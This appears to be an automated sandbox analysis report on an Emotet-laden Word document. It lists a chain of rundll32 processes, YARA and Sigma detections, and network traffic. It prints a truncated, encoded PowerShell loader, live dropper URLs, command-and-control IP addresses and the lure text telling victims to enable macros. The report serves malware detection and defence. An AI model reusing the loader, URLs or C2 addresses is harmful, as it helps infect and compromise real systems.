        • rundll32.exe (PID: 2532 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2760 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ocet\gyzufj.pjr',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2696 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mylz\dnoauh.fda',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2708 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Skqv\bpgr.lft',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 824 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rmmi\fgaafkb.bqv',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2468 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeay\tsbyty.hpi',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2472 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jfjk\etjwcl.eoy',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2804 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cyjj\rnycqfi.rmc',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 3008 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fpxy\zbyjv.xxd',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 3012 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xcmo\muvihv.sjs',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2104461658.0000000000251000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000005.00000002.2095452042.0000000001C04000.00000004.00000040.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x1f30:$s1: POwersheLL
    00000007.00000002.2097868806.0000000000201000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      0000000A.00000002.2102162180.0000000000190000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000009.00000002.2100838145.0000000000180000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          Click to see the 17 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          14.2.rundll32.exe.1e0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            9.2.rundll32.exe.1a0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              9.2.rundll32.exe.180000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                15.2.rundll32.exe.1d0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  10.2.rundll32.exe.190000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    Click to see the 25 entries

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                    Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAcgAnA

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus detection for URL or domainShow sources
                    Source: https://goldilockstraining.com/wp-includes/bftt/Avira URL Cloud: Label: malware
                    Source: http://biglaughs.org/smallpotatoes/rRwRzc/Avira URL Cloud: Label: malware
                    Source: http://paulscomputing.com/CraigsMagicSquare/H/Avira URL Cloud: Label: malware
                    Source: http://goldcoastoffice365.com/temp/X/Avira URL Cloud: Label: phishing
                    Source: http://goldcoastoffice365.com/temp/X/PAvira URL Cloud: Label: phishing
                    Source: http://azraktours.com/wp-content/NWF9jC/Avira URL Cloud: Label: malware
                    Source: http://josegene.com/theme/gU8/Avira URL Cloud: Label: malware
                    Source: https://jeffdahlke.com/css/bg4n3/Avira URL Cloud: Label: malware
                    Multi AV Scanner detection for dropped fileShow sources
                    Source: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dllReversingLabs: Detection: 89%
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: Informacion_4-09757.docMetadefender: Detection: 36%Perma Link
                    Source: Informacion_4-09757.docReversingLabs: Detection: 75%
                    Machine Learning detection for dropped fileShow sources
                    Source: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dllJoe Sandbox ML: detected
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
                    Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096764836.0000000002B97000.00000004.00000040.sdmp
                    Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2101464007.000000001B3D0000.00000002.00000001.sdmp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: global trafficDNS query: name: paulscomputing.com
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 167.71.148.58:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 216.218.207.98:80

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49168 -> 184.66.18.83:80
                    Potential dropper URLs found in powershell memoryShow sources
                    Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmpString found in memory: http://biglaughs.org/smallpotatoes/rRwRzc/
                    Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmpString found in memory: http://josegene.com/theme/gU8/
                    Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmpString found in memory: http://paulscomputing.com/CraigsMagicSquare/H/
                    Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmpString found in memory: https://goldilockstraining.com/wp-includes/bftt/
                    Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmpString found in memory: https://jeffdahlke.com/css/bg4n3/
                    Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmpString found in memory: http://azraktours.com/wp-content/NWF9jC/
                    Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmpString found in memory: http://goldcoastoffice365.com/temp/X/
                    Source: global trafficHTTP traffic detected: GET /CraigsMagicSquare/H/ HTTP/1.1Host: paulscomputing.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 167.71.148.58 167.71.148.58
                    Source: Joe Sandbox ViewIP Address: 202.187.222.40 202.187.222.40
                    Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                    Source: Joe Sandbox ViewASN Name: TTNET-MYTIMEdotComBerhadMY TTNET-MYTIMEdotComBerhadMY
                    Source: Joe Sandbox ViewASN Name: SHAWCA SHAWCA
                    Source: global trafficHTTP traffic detected: POST /ta2men4jqfnerm/ HTTP/1.1DNT: 0Referer: 167.71.148.58/ta2men4jqfnerm/Content-Type: multipart/form-data; boundary=------------------NYbEqHIaKH4WS2W1IvUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.71.148.58:443Content-Length: 7684Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 184.66.18.83
                    Source: unknownTCP traffic detected without corresponding DNS query: 184.66.18.83
                    Source: unknownTCP traffic detected without corresponding DNS query: 202.187.222.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 202.187.222.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 202.187.222.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 202.187.222.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 202.187.222.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 202.187.222.40
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4F87BA3-97C0-4A14-814E-1968BCE52029}.tmpJump to behavior
                    Source: global trafficHTTP traffic detected: GET /CraigsMagicSquare/H/ HTTP/1.1Host: paulscomputing.comConnection: Keep-Alive
                    Source: rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                    Source: unknownDNS traffic detected: queries for: paulscomputing.com
                    Source: unknownHTTP traffic detected: POST /ta2men4jqfnerm/ HTTP/1.1DNT: 0Referer: 167.71.148.58/ta2men4jqfnerm/Content-Type: multipart/form-data; boundary=------------------NYbEqHIaKH4WS2W1IvUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.71.148.58:443Content-Length: 7684Connection: Keep-AliveCache-Control: no-cache
                    Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmpString found in binary or memory: http://azraktours.com/wp-content/NWF9jC/
                    Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmpString found in binary or memory: http://biglaughs.org/smallpotatoes/rRwRzc/
                    Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmpString found in binary or memory: http://goldcoastoffice365.com/temp/X/
                    Source: powershell.exe, 00000005.00000002.2096848822.0000000002C06000.00000004.00000001.sdmpString found in binary or memory: http://goldcoastoffice365.com/temp/X/P
                    Source: rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                    Source: rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                    Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmpString found in binary or memory: http://josegene.com/theme/gU8/
                    Source: rundll32.exe, 00000006.00000002.2103730414.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100245452.00000000020E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100381220.0000000001F57000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                    Source: rundll32.exe, 00000006.00000002.2103730414.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100245452.00000000020E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100381220.0000000001F57000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                    Source: powershell.exe, 00000005.00000002.2100658698.0000000003B1A000.00000004.00000001.sdmpString found in binary or memory: http://paulscomputing.com
                    Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2101714623.000000001B551000.00000004.00000001.sdmpString found in binary or memory: http://paulscomputing.com/CraigsMagicSquare/H/
                    Source: powershell.exe, 00000005.00000002.2096036596.00000000022B0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100891338.0000000002800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2101517082.00000000027F0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                    Source: rundll32.exe, 00000006.00000002.2103730414.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100245452.00000000020E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100381220.0000000001F57000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                    Source: rundll32.exe, 00000006.00000002.2103730414.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100245452.00000000020E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100381220.0000000001F57000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                    Source: powershell.exe, 00000005.00000002.2096036596.00000000022B0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100891338.0000000002800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2101517082.00000000027F0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2104721248.0000000002830000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                    Source: rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                    Source: rundll32.exe, 00000006.00000002.2103730414.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100245452.00000000020E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100381220.0000000001F57000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                    Source: rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                    Source: powershell.exe, 00000005.00000002.2095353047.0000000000337000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                    Source: powershell.exe, 00000005.00000002.2095369580.0000000000367000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                    Source: powershell.exe, 00000005.00000002.2095353047.0000000000337000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
                    Source: rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                    Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmpString found in binary or memory: https://goldilockstraining.com/wp-includes/bftt/
                    Source: powershell.exe, 00000005.00000002.2100488741.0000000003972000.00000004.00000001.sdmpString found in binary or memory: https://jeffdahlke.com/css/bg4n3/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443

                    E-Banking Fraud:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: 0000000B.00000002.2104461658.0000000000251000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2097868806.0000000000201000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2102162180.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2100838145.0000000000180000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2104434238.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2107224679.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2109356030.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2097792177.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2102227386.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2346608733.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2105642639.0000000000201000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2107394819.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2105597676.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2110979114.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2109268872.0000000000140000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2346635029.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2099576537.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2100056068.0000000000701000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2100874845.00000000001A1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2111023949.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.1a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE

                    System Summary:

                    barindex
                    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                    Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I o' ' Wo'd"
                    Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                    Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I o' ' Wo'd" N@m 13 ;a 10096 G) FI
